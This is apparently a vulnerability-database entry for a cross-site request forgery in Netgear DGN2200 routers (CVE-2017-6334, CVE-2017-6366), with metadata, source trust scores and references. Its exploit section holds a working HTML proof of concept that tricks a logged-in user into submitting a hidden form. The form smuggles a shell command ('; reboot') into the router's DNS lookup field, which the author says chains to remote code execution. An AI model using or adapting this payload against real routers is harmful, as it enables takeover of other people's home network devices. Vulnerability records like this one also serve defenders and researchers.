ID

VAR-E-201702-0147


CVE

cve_id:CVE-2017-6334

Trust: 2.3

cve_id:CVE-2017-6366

Trust: 1.0

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41472

EDB ID

41472


TITLE

Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41472

DESCRIPTION

Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery. CVE-2017-6334CVE-2017-6366 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41472

AFFECTED PRODUCTS

vendor:netgearmodel:dgn2200v1/v2/v3/v4scope: - version: -

Trust: 1.6

vendor:netgearmodel:dgn2200 dnslookup.cgiscope: - version: -

Trust: 0.5

vendor:netgearmodel:dgn2201 dnslookup.cgi remotescope:eqversion:v1/v2/v3/v4

Trust: 0.5

vendor:netgearmodel:dgn2200v4scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v3scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v2scope:eqversion:0

Trust: 0.3

vendor:netgearmodel:dgn2200v1scope:eqversion:0

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41472 // EDBNET: 91672

EXPLOIT

# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4

# CVE: CVE-2017-6366

A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.

<!DOCTYPE html>
<html>
<title>netgear router CSRF</title>
<body>
<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
<input type="hidden" name="lookup" value="Lookup">
<button name="clc" value="clc">Would You Dare To?</button>
</form>
</body>
</html>

<!-- 2017-02-27 by SivertPL -->

Trust: 1.0

sources: EXPLOIT-DB: 41472

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 41472

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41472

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 41472 // EDBNET: 91672

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 0.5

tag:cgi

Trust: 0.5

sources: PACKETSTORM: 143128 // PACKETSTORM: 141337

CREDITS

SivertPL

Trust: 0.6

sources: EXPLOIT-DB: 41472

EXTERNAL IDS

db:NVDid:CVE-2017-6334

Trust: 2.3

db:EXPLOIT-DBid:41472

Trust: 1.6

db:NVDid:CVE-2017-6366

Trust: 1.0

db:EDBNETid:91672

Trust: 0.6

db:PACKETSTORMid:143128

Trust: 0.5

db:PACKETSTORMid:141337

Trust: 0.5

db:BIDid:96463

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41472 // EDBNET: 91672

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-6334

Trust: 2.0

url:https://nvd.nist.gov/vuln/detail/cve-2017-6366

Trust: 1.0

url:https://www.exploit-db.com/exploits/41472/

Trust: 0.6

url:http://www.netgear.com

Trust: 0.3

sources: BID: 96463 // PACKETSTORM: 143128 // PACKETSTORM: 141337 // EXPLOIT-DB: 41472 // EDBNET: 91672

SOURCES

db:BIDid:96463
db:PACKETSTORMid:143128
db:PACKETSTORMid:141337
db:EXPLOIT-DBid:41472
db:EDBNETid:91672

LAST UPDATE DATE

2022-07-27T09:11:33.421000+00:00


SOURCES UPDATE DATE

db:BIDid:96463date:2017-03-07T01:08:00

SOURCES RELEASE DATE

db:BIDid:96463date:2017-02-26T00:00:00
db:PACKETSTORMid:143128date:2017-06-24T17:45:41
db:PACKETSTORMid:141337date:2017-02-26T05:55:55
db:EXPLOIT-DBid:41472date:2017-02-28T00:00:00
db:EDBNETid:91672date:2017-02-28T00:00:00